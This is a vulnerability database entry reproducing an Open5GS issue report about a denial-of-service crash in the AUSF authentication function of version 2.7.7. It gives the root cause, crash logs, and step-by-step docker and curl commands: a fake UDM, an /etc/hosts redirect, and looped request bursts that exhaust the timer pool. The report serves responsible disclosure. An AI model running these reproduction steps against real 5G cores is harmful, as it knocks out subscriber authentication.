| Название | Open5GS AUSF v2.7.7 Denial of Service |
|---|
| Описание | ### Open5GS Release, Revision, or Tag
v2.7.7
### Description
AUSF crashes when a valid authentication context exists and
`PUT /nausf-auth/v1/ue-authentications/{authCtxId}/5g-aka-confirmation`
is sent in repeated bursts while UDM keeps `POST /nudm-ueau/v1/{supi}/auth-events`
hanging.
This follows the same pending-xact pattern as the already confirmed
`POST /nausf-auth/v1/ue-authentications` timer-pool issue, but the final abort
site is different:
```c
r = ausf_sbi_discover_and_send(...);
ogs_expect(r == OGS_OK);
ogs_assert(r != OGS_ERROR);
```
for the confirmation handler:
```c
bool ausf_nausf_auth_handle_authenticate_confirmation(...)
```
As with the POST route, client-side HTTP/2 streams are released on RST/close,
while outbound `nudm-ueau` xacts and their response timers remain pending until
timeout. Repeating short-lived confirmation bursts therefore consumes the timer
pool until `ogs_timer_add()` fails, `ausf_sbi_discover_and_send()` returns
`OGS_ERROR`, and AUSF aborts at `nausf-handler.c:115`.
### Root cause
- Entry route:
`PUT /nausf-auth/v1/ue-authentications/{authCtxId}/5g-aka-confirmation`
- Preconditions:
a valid auth context must already exist, and UDM must keep
`POST /nudm-ueau/v1/{supi}/auth-events` hanging
- Exact crash site:
`../src/ausf/nausf-handler.c:115`
- Upstream failures:
`../lib/core/ogs-timer.c:82-85`
`../lib/sbi/context.c:2592-2600`
`../src/ausf/sbi-path.c:97-103`
- Root cause family:
timer pool exhaustion leading to assertion abort
- Controlling factor:
number of short-lived confirmation requests whose outbound `auth-events`
xacts remain pending
### Steps to reproduce
1. Start the controllable fake UDM:
```bash
docker stop fake-ausf-udm 2>/dev/null || true
printf 'control\n' > /home/ubuntu/open5gs_277/.audit_tmp/ausf_fake_udm.mode
docker run --rm -d \
--name fake-ausf-udm \
--network open5gs \
-v /home/ubuntu/open5gs_277/.audit_tmp:/srv \
node:24-alpine \
node /srv/ausf_fake_udm.js
```
2. Restart AUSF, override `udm.open5gs.org` to the fake UDM, and create one
valid auth context:
```bash
docker restart ausf
docker exec ausf sh -lc "grep -v 'udm.open5gs.org' /etc/hosts > /tmp/hosts.new && printf '10.33.33.9\tudm.open5gs.org\n' >> /tmp/hosts.new && cat /tmp/hosts.new > /etc/hosts"
docker run --rm --network open5gs curlimages/curl:8.10.1 \
--http2-prior-knowledge -sS -D - \
-H content-type:application/json \
--data '{"supiOrSuci":"suci-0-001-01-0-0-0-000000000000001","servingNetworkName":"5G:mnc001.mcc001.3gppnetwork.org"}' \
http://ausf.open5gs.org/nausf-auth/v1/ue-authentications
```
The returned confirmation path in this repro was:
```text
/nausf-auth/v1/ue-authentications/1/5g-aka-confirmation
```
3. Control case: one launch-only burst while UDM hangs `POST /auth-events`.
AUSF should stay running.
```bash
printf 'hang-auth-events-post\n' > /home/ubuntu/open5gs_277/.audit_tmp/ausf_fake_udm.mode
docker exec fake-ausf-udm sh -lc 'AUSF_STRESS_METHOD=PUT AUSF_STRESS_PATH=/nausf-auth/v1/ue-authentications/1/5g-aka-confirmation AUSF_STRESS_BODY_FILE=/srv/ausf_confirmation_body.json AUSF_STRESS_CONNECTIONS=8 AUSF_STRESS_REQUESTS_PER_CONNECTION=256 AUSF_STRESS_LAUNCH_ONLY_MS=1000 node /srv/ausf_request_stress.js'
docker inspect -f '{{.State.Status}} {{.State.ExitCode}}' ausf
```
4. Malicious case: repeat the same burst several times so `auth-events` xacts
accumulate and exhaust the timer pool.
```bash
docker exec fake-ausf-udm sh -lc 'for i in 1 2 3 4 5 6 7; do AUSF_STRESS_METHOD=PUT AUSF_STRESS_PATH=/nausf-auth/v1/ue-authentications/1/5g-aka-confirmation AUSF_STRESS_BODY_FILE=/srv/ausf_confirmation_body.json AUSF_STRESS_CONNECTIONS=8 AUSF_STRESS_REQUESTS_PER_CONNECTION=256 AUSF_STRESS_LAUNCH_ONLY_MS=1000 node /srv/ausf_request_stress.js; done'
docker inspect -f '{{.State.Status}} {{.State.ExitCode}} {{.State.FinishedAt}}' ausf
docker logs --tail 120 ausf 2>&1
```
### Logs
```shell
04/23 01:59:22.204: [event] ERROR: Failed to allocate timer object from pool (../lib/core/ogs-timer.c:84)
04/23 01:59:22.204: [sbi] ERROR: ogs_timer_add() failed (../lib/sbi/context.c:2596)
04/23 01:59:22.204: [ausf] ERROR: ausf_sbi_discover_and_send() failed (../src/ausf/sbi-path.c:98)
04/23 01:59:22.212: [ausf] ERROR: ausf_nausf_auth_handle_authenticate_confirmation: Expectation `r == OGS_OK' failed. (../src/ausf/nausf-handler.c:114)
04/23 01:59:22.212: [ausf] FATAL: ausf_nausf_auth_handle_authenticate_confirmation: Assertion `r != OGS_ERROR' failed. (../src/ausf/nausf-handler.c:115)
```
### Expected behaviour
AUSF should reject excess pending confirmation work with a normal HTTP error and remain running.
### Observed Behaviour
Repeated launch-only confirmation bursts exhaust the timer pool for pending `auth-events` xacts and crash AUSF with exit code `139`.
### eNodeB/gNodeB
Not required.
### UE Models and versions
Not required. |
|---|
| Источник | ⚠️ https://github.com/open5gs/open5gs/issues/4472 |
|---|
| Пользователь | ZiyuLin (UID 93568) |
|---|
| Представление | 01.05.2026 10:36 (1 месяц назад) |
|---|
| Модерация | 16.05.2026 14:38 (15 days later) |
|---|
| Статус | принято |
|---|
| Запись VulDB | 364332 [Open5GS до 2.7.7 AUSF nausf-handler.c ogs_timer_add отказ в обслуживании] |
|---|
| Баллы | 20 |
|---|